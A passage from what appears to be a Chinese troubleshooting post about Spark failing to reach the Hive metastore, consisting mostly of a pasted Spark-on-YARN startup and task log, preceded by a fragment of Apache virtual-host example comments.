virtual hosts. # # You may use the command line option '-S' to verify your virtual host # configuration. # # Use name-based virtual hosting. # #NameVirtualHost *:80 # # NOTE: NameVirtualHost cannot be used without a port specifier # (e.g. :80) if mod_ssl is being used, due to the nature of the # SSL protocol. # # # VirtualHost example: # Almost any Apache directive may go into a VirtualHost container. # The first VirtualHost section is used for requests without a known # server name. # #<VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com # DocumentRoot /www/docs/dummy-host.example.com # ServerName dummy-host.example.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common #</VirtualHost>
spark 读取不到hive metastore 获取不到数据库
直接上异常 ``` Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties SLF4J: Class path contains multiple SLF4J bindings. SLF4J: Found binding in [jar:file:/data01/hadoop/yarn/local/filecache/355/spark2-hdp-yarn-archive.tar.gz/slf4j-log4j12-1.7.16.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: Found binding in [jar:file:/usr/hdp/2.6.5.0-292/hadoop/lib/slf4j-log4j12-1.7.10.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation. SLF4J: Actual binding is of type [org.slf4j.impl.Log4jLoggerFactory] 19/08/13 19:53:17 INFO SignalUtils: Registered signal handler for TERM 19/08/13 19:53:17 INFO SignalUtils: Registered signal handler for HUP 19/08/13 19:53:17 INFO SignalUtils: Registered signal handler for INT 19/08/13 19:53:17 INFO SecurityManager: Changing view acls to: yarn,hdfs 19/08/13 19:53:17 INFO SecurityManager: Changing modify acls to: yarn,hdfs 19/08/13 19:53:17 INFO SecurityManager: Changing view acls groups to: 19/08/13 19:53:17 INFO SecurityManager: Changing modify acls groups to: 19/08/13 19:53:17 INFO SecurityManager: SecurityManager: authentication disabled; ui acls disabled; users with view permissions: Set(yarn, hdfs); groups with view permissions: Set(); users with modify permissions: Set(yarn, hdfs); groups with modify permissions: Set() 19/08/13 19:53:18 INFO ApplicationMaster: Preparing Local resources 19/08/13 19:53:19 INFO ApplicationMaster: ApplicationAttemptId: appattempt_1565610088533_0087_000001 19/08/13 19:53:19 INFO ApplicationMaster: Starting the user application in a separate Thread 19/08/13 19:53:19 INFO ApplicationMaster: Waiting for spark context initialization... 19/08/13 19:53:19 INFO SparkContext: Running Spark version 2.3.0.2.6.5.0-292 19/08/13 19:53:19 INFO SparkContext: Submitted application: voice_stream 19/08/13 19:53:19 INFO SecurityManager: Changing view acls to: yarn,hdfs 19/08/13 19:53:19 INFO SecurityManager: Changing modify acls to: yarn,hdfs 19/08/13 19:53:19 INFO SecurityManager: Changing view acls groups to: 19/08/13 19:53:19 INFO SecurityManager: Changing modify acls groups to: 19/08/13 19:53:19 INFO SecurityManager: SecurityManager: authentication disabled; ui acls disabled; users with view permissions: Set(yarn, hdfs); groups with view permissions: Set(); users with modify permissions: Set(yarn, hdfs); groups with modify permissions: Set() 19/08/13 19:53:19 INFO Utils: Successfully started service 'sparkDriver' on port 20410. 19/08/13 19:53:19 INFO SparkEnv: Registering MapOutputTracker 19/08/13 19:53:19 INFO SparkEnv: Registering BlockManagerMaster 19/08/13 19:53:19 INFO BlockManagerMasterEndpoint: Using org.apache.spark.storage.DefaultTopologyMapper for getting topology information 19/08/13 19:53:19 INFO BlockManagerMasterEndpoint: BlockManagerMasterEndpoint up 19/08/13 19:53:19 INFO DiskBlockManager: Created local directory at /data01/hadoop/yarn/local/usercache/hdfs/appcache/application_1565610088533_0087/blockmgr-94d35b97-43b2-496e-a4cb-73ecd3ed186c 19/08/13 19:53:19 INFO MemoryStore: MemoryStore started with capacity 366.3 MB 19/08/13 19:53:19 INFO SparkEnv: Registering OutputCommitCoordinator 19/08/13 19:53:19 INFO JettyUtils: Adding filter: org.apache.hadoop.yarn.server.webproxy.amfilter.AmIpFilter 19/08/13 19:53:19 INFO Utils: Successfully started service 'SparkUI' on port 28852. 19/08/13 19:53:19 INFO SparkUI: Bound SparkUI to 0.0.0.0, and started at http://datanode02:28852 19/08/13 19:53:19 INFO YarnClusterScheduler: Created YarnClusterScheduler 19/08/13 19:53:20 INFO SchedulerExtensionServices: Starting Yarn extension services with app application_1565610088533_0087 and attemptId Some(appattempt_1565610088533_0087_000001) 19/08/13 19:53:20 INFO Utils: Successfully started service 'org.apache.spark.network.netty.NettyBlockTransferService' on port 31984. 19/08/13 19:53:20 INFO NettyBlockTransferService: Server created on datanode02:31984 19/08/13 19:53:20 INFO BlockManager: Using org.apache.spark.storage.RandomBlockReplicationPolicy for block replication policy 19/08/13 19:53:20 INFO BlockManagerMaster: Registering BlockManager BlockManagerId(driver, datanode02, 31984, None) 19/08/13 19:53:20 INFO BlockManagerMasterEndpoint: Registering block manager datanode02:31984 with 366.3 MB RAM, BlockManagerId(driver, datanode02, 31984, None) 19/08/13 19:53:20 INFO BlockManagerMaster: Registered BlockManager BlockManagerId(driver, datanode02, 31984, None) 19/08/13 19:53:20 INFO BlockManager: Initialized BlockManager: BlockManagerId(driver, datanode02, 31984, None) 19/08/13 19:53:20 INFO EventLoggingListener: Logging events to hdfs:/spark2-history/application_1565610088533_0087_1 19/08/13 19:53:20 INFO ApplicationMaster: =============================================================================== YARN executor launch context: env: CLASSPATH -> {{PWD}}<CPS>{{PWD}}/__spark_conf__<CPS>{{PWD}}/__spark_libs__/*<CPS>/usr/hdp/2.6.5.0-292/hadoop/conf<CPS>/usr/hdp/2.6.5.0-292/hadoop/*<CPS>/usr/hdp/2.6.5.0-292/hadoop/lib/*<CPS>/usr/hdp/current/hadoop-hdfs-client/*<CPS>/usr/hdp/current/hadoop-hdfs-client/lib/*<CPS>/usr/hdp/current/hadoop-yarn-client/*<CPS>/usr/hdp/current/hadoop-yarn-client/lib/*<CPS>/usr/hdp/current/ext/hadoop/*<CPS>$PWD/mr-framework/hadoop/share/hadoop/mapreduce/*:$PWD/mr-framework/hadoop/share/hadoop/mapreduce/lib/*:$PWD/mr-framework/hadoop/share/hadoop/common/*:$PWD/mr-framework/hadoop/share/hadoop/common/lib/*:$PWD/mr-framework/hadoop/share/hadoop/yarn/*:$PWD/mr-framework/hadoop/share/hadoop/yarn/lib/*:$PWD/mr-framework/hadoop/share/hadoop/hdfs/*:$PWD/mr-framework/hadoop/share/hadoop/hdfs/lib/*:$PWD/mr-framework/hadoop/share/hadoop/tools/lib/*:/usr/hdp/2.6.5.0-292/hadoop/lib/hadoop-lzo-0.6.0.2.6.5.0-292.jar:/etc/hadoop/conf/secure:/usr/hdp/current/ext/hadoop/*<CPS>{{PWD}}/__spark_conf__/__hadoop_conf__ SPARK_YARN_STAGING_DIR -> *********(redacted) SPARK_USER -> *********(redacted) command: LD_LIBRARY_PATH="/usr/hdp/current/hadoop-client/lib/native:/usr/hdp/current/hadoop-client/lib/native/Linux-amd64-64:$LD_LIBRARY_PATH" \ {{JAVA_HOME}}/bin/java \ -server \ -Xmx5120m \ -Djava.io.tmpdir={{PWD}}/tmp \ '-Dspark.history.ui.port=18081' \ '-Dspark.rpc.message.maxSize=100' \ -Dspark.yarn.app.container.log.dir=<LOG_DIR> \ -XX:OnOutOfMemoryError='kill %p' \ org.apache.spark.executor.CoarseGrainedExecutorBackend \ --driver-url \ spark://CoarseGrainedScheduler@datanode02:20410 \ --executor-id \ <executorId> \ --hostname \ <hostname> \ --cores \ 2 \ --app-id \ application_1565610088533_0087 \ --user-class-path \ file:$PWD/__app__.jar \ --user-class-path \ file:$PWD/hadoop-common-2.7.3.jar \ --user-class-path \ file:$PWD/guava-12.0.1.jar \ --user-class-path \ file:$PWD/hbase-server-1.2.8.jar \ --user-class-path \ file:$PWD/hbase-protocol-1.2.8.jar \ --user-class-path \ file:$PWD/hbase-client-1.2.8.jar \ --user-class-path \ file:$PWD/hbase-common-1.2.8.jar \ --user-class-path \ file:$PWD/mysql-connector-java-5.1.44-bin.jar \ --user-class-path \ file:$PWD/spark-streaming-kafka-0-8-assembly_2.11-2.3.2.jar \ --user-class-path \ file:$PWD/spark-examples_2.11-1.6.0-typesafe-001.jar \ --user-class-path \ file:$PWD/fastjson-1.2.7.jar \ 1><LOG_DIR>/stdout \ 2><LOG_DIR>/stderr resources: spark-streaming-kafka-0-8-assembly_2.11-2.3.2.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/spark-streaming-kafka-0-8-assembly_2.11-2.3.2.jar" } size: 12271027 timestamp: 1565697198603 type: FILE visibility: PRIVATE spark-examples_2.11-1.6.0-typesafe-001.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/spark-examples_2.11-1.6.0-typesafe-001.jar" } size: 1867746 timestamp: 1565697198751 type: FILE visibility: PRIVATE hbase-server-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-server-1.2.8.jar" } size: 4197896 timestamp: 1565697197770 type: FILE visibility: PRIVATE hbase-common-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-common-1.2.8.jar" } size: 570163 timestamp: 1565697198318 type: FILE visibility: PRIVATE __app__.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/spark_history_data2.jar" } size: 44924 timestamp: 1565697197260 type: FILE visibility: PRIVATE guava-12.0.1.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/guava-12.0.1.jar" } size: 1795932 timestamp: 1565697197614 type: FILE visibility: PRIVATE hbase-client-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-client-1.2.8.jar" } size: 1306401 timestamp: 1565697198180 type: FILE visibility: PRIVATE __spark_conf__ -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/__spark_conf__.zip" } size: 273513 timestamp: 1565697199131 type: ARCHIVE visibility: PRIVATE fastjson-1.2.7.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/fastjson-1.2.7.jar" } size: 417221 timestamp: 1565697198865 type: FILE visibility: PRIVATE hbase-protocol-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-protocol-1.2.8.jar" } size: 4366252 timestamp: 1565697198023 type: FILE visibility: PRIVATE __spark_libs__ -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/hdp/apps/2.6.5.0-292/spark2/spark2-hdp-yarn-archive.tar.gz" } size: 227600110 timestamp: 1549953820247 type: ARCHIVE visibility: PUBLIC mysql-connector-java-5.1.44-bin.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/mysql-connector-java-5.1.44-bin.jar" } size: 999635 timestamp: 1565697198445 type: FILE visibility: PRIVATE hadoop-common-2.7.3.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hadoop-common-2.7.3.jar" } size: 3479293 timestamp: 1565697197476 type: FILE visibility: PRIVATE =============================================================================== 19/08/13 19:53:20 INFO RMProxy: Connecting to ResourceManager at namenode02/10.1.38.38:8030 19/08/13 19:53:20 INFO YarnRMClient: Registering the ApplicationMaster 19/08/13 19:53:20 INFO YarnAllocator: Will request 3 executor container(s), each with 2 core(s) and 5632 MB memory (including 512 MB of overhead) 19/08/13 19:53:20 INFO YarnSchedulerBackend$YarnSchedulerEndpoint: ApplicationMaster registered as NettyRpcEndpointRef(spark://YarnAM@datanode02:20410) 19/08/13 19:53:20 INFO YarnAllocator: Submitted 3 unlocalized container requests. 19/08/13 19:53:20 INFO ApplicationMaster: Started progress reporter thread with (heartbeat : 3000, initial allocation : 200) intervals 19/08/13 19:53:20 INFO AMRMClientImpl: Received new token for : datanode03:45454 19/08/13 19:53:21 INFO YarnAllocator: Launching container container_e20_1565610088533_0087_01_000002 on host datanode03 for executor with ID 1 19/08/13 19:53:21 INFO YarnAllocator: Received 1 containers from YARN, launching executors on 1 of them. 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: yarn.client.max-cached-nodemanagers-proxies : 0 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: Opening proxy : datanode03:45454 19/08/13 19:53:21 INFO AMRMClientImpl: Received new token for : datanode01:45454 19/08/13 19:53:21 INFO YarnAllocator: Launching container container_e20_1565610088533_0087_01_000003 on host datanode01 for executor with ID 2 19/08/13 19:53:21 INFO YarnAllocator: Received 1 containers from YARN, launching executors on 1 of them. 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: yarn.client.max-cached-nodemanagers-proxies : 0 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: Opening proxy : datanode01:45454 19/08/13 19:53:22 INFO AMRMClientImpl: Received new token for : datanode02:45454 19/08/13 19:53:22 INFO YarnAllocator: Launching container container_e20_1565610088533_0087_01_000004 on host datanode02 for executor with ID 3 19/08/13 19:53:22 INFO YarnAllocator: Received 1 containers from YARN, launching executors on 1 of them. 19/08/13 19:53:22 INFO ContainerManagementProtocolProxy: yarn.client.max-cached-nodemanagers-proxies : 0 19/08/13 19:53:22 INFO ContainerManagementProtocolProxy: Opening proxy : datanode02:45454 19/08/13 19:53:24 INFO YarnSchedulerBackend$YarnDriverEndpoint: Registered executor NettyRpcEndpointRef(spark-client://Executor) (10.1.198.144:41122) with ID 1 19/08/13 19:53:25 INFO YarnSchedulerBackend$YarnDriverEndpoint: Registered executor NettyRpcEndpointRef(spark-client://Executor) (10.1.229.163:24656) with ID 3 19/08/13 19:53:25 INFO BlockManagerMasterEndpoint: Registering block manager datanode03:3328 with 2.5 GB RAM, BlockManagerId(1, datanode03, 3328, None) 19/08/13 19:53:25 INFO BlockManagerMasterEndpoint: Registering block manager datanode02:28863 with 2.5 GB RAM, BlockManagerId(3, datanode02, 28863, None) 19/08/13 19:53:25 INFO YarnSchedulerBackend$YarnDriverEndpoint: Registered executor NettyRpcEndpointRef(spark-client://Executor) (10.1.229.158:64276) with ID 2 19/08/13 19:53:25 INFO YarnClusterSchedulerBackend: SchedulerBackend is ready for scheduling beginning after reached minRegisteredResourcesRatio: 0.8 19/08/13 19:53:25 INFO YarnClusterScheduler: YarnClusterScheduler.postStartHook done 19/08/13 19:53:25 INFO BlockManagerMasterEndpoint: Registering block manager datanode01:20487 with 2.5 GB RAM, BlockManagerId(2, datanode01, 20487, None) 19/08/13 19:53:25 WARN SparkContext: Using an existing SparkContext; some configuration may not take effect. 19/08/13 19:53:25 INFO SparkContext: Starting job: start at VoiceApplication2.java:128 19/08/13 19:53:25 INFO DAGScheduler: Registering RDD 1 (start at VoiceApplication2.java:128) 19/08/13 19:53:25 INFO DAGScheduler: Got job 0 (start at VoiceApplication2.java:128) with 20 output partitions 19/08/13 19:53:25 INFO DAGScheduler: Final stage: ResultStage 1 (start at VoiceApplication2.java:128) 19/08/13 19:53:25 INFO DAGScheduler: Parents of final stage: List(ShuffleMapStage 0) 19/08/13 19:53:25 INFO DAGScheduler: Missing parents: List(ShuffleMapStage 0) 19/08/13 19:53:26 INFO DAGScheduler: Submitting ShuffleMapStage 0 (MapPartitionsRDD[1] at start at VoiceApplication2.java:128), which has no missing parents 19/08/13 19:53:26 INFO MemoryStore: Block broadcast_0 stored as values in memory (estimated size 3.1 KB, free 366.3 MB) 19/08/13 19:53:26 INFO MemoryStore: Block broadcast_0_piece0 stored as bytes in memory (estimated size 2011.0 B, free 366.3 MB) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode02:31984 (size: 2011.0 B, free: 366.3 MB) 19/08/13 19:53:26 INFO SparkContext: Created broadcast 0 from broadcast at DAGScheduler.scala:1039 19/08/13 19:53:26 INFO DAGScheduler: Submitting 50 missing tasks from ShuffleMapStage 0 (MapPartitionsRDD[1] at start at VoiceApplication2.java:128) (first 15 tasks are for partitions Vector(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)) 19/08/13 19:53:26 INFO YarnClusterScheduler: Adding task set 0.0 with 50 tasks 19/08/13 19:53:26 INFO TaskSetManager: Starting task 0.0 in stage 0.0 (TID 0, datanode02, executor 3, partition 0, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 1.0 in stage 0.0 (TID 1, datanode03, executor 1, partition 1, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 2.0 in stage 0.0 (TID 2, datanode01, executor 2, partition 2, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 3.0 in stage 0.0 (TID 3, datanode02, executor 3, partition 3, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 4.0 in stage 0.0 (TID 4, datanode03, executor 1, partition 4, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 5.0 in stage 0.0 (TID 5, datanode01, executor 2, partition 5, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode02:28863 (size: 2011.0 B, free: 2.5 GB) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode03:3328 (size: 2011.0 B, free: 2.5 GB) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode01:20487 (size: 2011.0 B, free: 2.5 GB) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 6.0 in stage 0.0 (TID 6, datanode02, executor 3, partition 6, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 7.0 in stage 0.0 (TID 7, datanode02, executor 3, partition 7, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 3.0 in stage 0.0 (TID 3) in 693 ms on datanode02 (executor 3) (1/50) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 0.0 in stage 0.0 (TID 0) in 712 ms on datanode02 (executor 3) (2/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 8.0 in stage 0.0 (TID 8, datanode02, executor 3, partition 8, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 7.0 in stage 0.0 (TID 7) in 21 ms on datanode02 (executor 3) (3/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 9.0 in stage 0.0 (TID 9, datanode02, executor 3, partition 9, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 6.0 in stage 0.0 (TID 6) in 26 ms on datanode02 (executor 3) (4/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 10.0 in stage 0.0 (TID 10, datanode02, executor 3, partition 10, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 8.0 in stage 0.0 (TID 8) in 23 ms on datanode02 (executor 3) (5/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 11.0 in stage 0.0 (TID 11, datanode02, executor 3, partition 11, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 9.0 in stage 0.0 (TID 9) in 25 ms on datanode02 (executor 3) (6/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 12.0 in stage 0.0 (TID 12, datanode02, executor 3, partition 12, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 10.0 in stage 0.0 (TID 10) in 18 ms on datanode02 (executor 3) (7/50) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 11.0 in stage 0.0 (TID 11) in 14 ms on datanode02 (executor 3) (8/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 13.0 in stage 0.0 (TID 13, datanode02, executor 3, partition 13, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 14.0 in stage 0.0 (TID 14, datanode02, executor 3, partition 14, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 12.0 in stage 0.0 (TID 12) in 16 ms on datanode02 (executor 3) (9/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 15.0 in stage 0.0 (TID 15, datanode02, executor 3, partition 15, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 13.0 in stage 0.0 (TID 13) in 22 ms on datanode02 (executor 3) (10/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 16.0 in stage 0.0 (TID 16, datanode02, executor 3, partition 16, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 14.0 in stage 0.0 (TID 14) in 16 ms on datanode02 (executor 3) (11/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 17.0 in stage 0.0 (TID 17, datanode02, executor 3, partition 17, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 15.0 in stage 0.0 (TID 15) in 13 ms on datanode02 (executor 3) (12/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 18.0 in stage 0.0 (TID 18, datanode01, executor 2, partition 18, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 19.0 in stage 0.0 (TID 19, datanode01, executor 2, partition 19, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 5.0 in stage 0.0 (TID 5) in 787 ms on datanode01 (executor 2) (13/50) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 2.0 in stage 0.0 (TID 2) in 789 ms on datanode01 (executor 2) (14/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 20.0 in stage 0.0 (TID 20, datanode03, executor 1, partition 20, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 21.0 in stage 0.0 (TID 21, datanode03, executor 1, partition 21, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 4.0 in stage 0.0 (TID 4) in 905 ms on datanode03 (executor 1) (15/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 1.0 in stage 0.0 (TID 1) in 907 ms on datanode03 (executor 1) (16/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 22.0 in stage 0.0 (TID 22, datanode02, executor 3, partition 22, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 23.0 in stage 0.0 (TID 23, datanode02, executor 3, partition 23, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 24.0 in stage 0.0 (TID 24, datanode01, executor 2, partition 24, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 18.0 in stage 0.0 (TID 18) in 124 ms on datanode01 (executor 2) (17/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 16.0 in stage 0.0 (TID 16) in 134 ms on datanode02 (executor 3) (18/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 25.0 in stage 0.0 (TID 25, datanode01, executor 2, partition 25, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 26.0 in stage 0.0 (TID 26, datanode03, executor 1, partition 26, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 17.0 in stage 0.0 (TID 17) in 134 ms on datanode02 (executor 3) (19/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 20.0 in stage 0.0 (TID 20) in 122 ms on datanode03 (executor 1) (20/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 27.0 in stage 0.0 (TID 27, datanode03, executor 1, partition 27, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 19.0 in stage 0.0 (TID 19) in 127 ms on datanode01 (executor 2) (21/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 21.0 in stage 0.0 (TID 21) in 123 ms on datanode03 (executor 1) (22/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 28.0 in stage 0.0 (TID 28, datanode02, executor 3, partition 28, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 29.0 in stage 0.0 (TID 29, datanode02, executor 3, partition 29, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 22.0 in stage 0.0 (TID 22) in 19 ms on datanode02 (executor 3) (23/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 23.0 in stage 0.0 (TID 23) in 18 ms on datanode02 (executor 3) (24/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 30.0 in stage 0.0 (TID 30, datanode01, executor 2, partition 30, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 31.0 in stage 0.0 (TID 31, datanode01, executor 2, partition 31, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 25.0 in stage 0.0 (TID 25) in 27 ms on datanode01 (executor 2) (25/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 24.0 in stage 0.0 (TID 24) in 29 ms on datanode01 (executor 2) (26/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 32.0 in stage 0.0 (TID 32, datanode02, executor 3, partition 32, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 29.0 in stage 0.0 (TID 29) in 16 ms on datanode02 (executor 3) (27/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 33.0 in stage 0.0 (TID 33, datanode03, executor 1, partition 33, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 26.0 in stage 0.0 (TID 26) in 30 ms on datanode03 (executor 1) (28/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 34.0 in stage 0.0 (TID 34, datanode02, executor 3, partition 34, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 28.0 in stage 0.0 (TID 28) in 21 ms on datanode02 (executor 3) (29/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 35.0 in stage 0.0 (TID 35, datanode03, executor 1, partition 35, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 27.0 in stage 0.0 (TID 27) in 32 ms on datanode03 (executor 1) (30/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 36.0 in stage 0.0 (TID 36, datanode02, executor 3, partition 36, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 32.0 in stage 0.0 (TID 32) in 11 ms on datanode02 (executor 3) (31/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 37.0 in stage 0.0 (TID 37, datanode01, executor 2, partition 37, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 30.0 in stage 0.0 (TID 30) in 18 ms on datanode01 (executor 2) (32/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 38.0 in stage 0.0 (TID 38, datanode01, executor 2, partition 38, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 31.0 in stage 0.0 (TID 31) in 20 ms on datanode01 (executor 2) (33/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 39.0 in stage 0.0 (TID 39, datanode03, executor 1, partition 39, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 33.0 in stage 0.0 (TID 33) in 17 ms on datanode03 (executor 1) (34/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 34.0 in stage 0.0 (TID 34) in 17 ms on datanode02 (executor 3) (35/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 40.0 in stage 0.0 (TID 40, datanode02, executor 3, partition 40, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 41.0 in stage 0.0 (TID 41, datanode03, executor 1, partition 41, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 35.0 in stage 0.0 (TID 35) in 17 ms on datanode03 (executor 1) (36/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 42.0 in stage 0.0 (TID 42, datanode02, executor 3, partition 42, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 36.0 in stage 0.0 (TID 36) in 16 ms on datanode02 (executor 3) (37/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 43.0 in stage 0.0 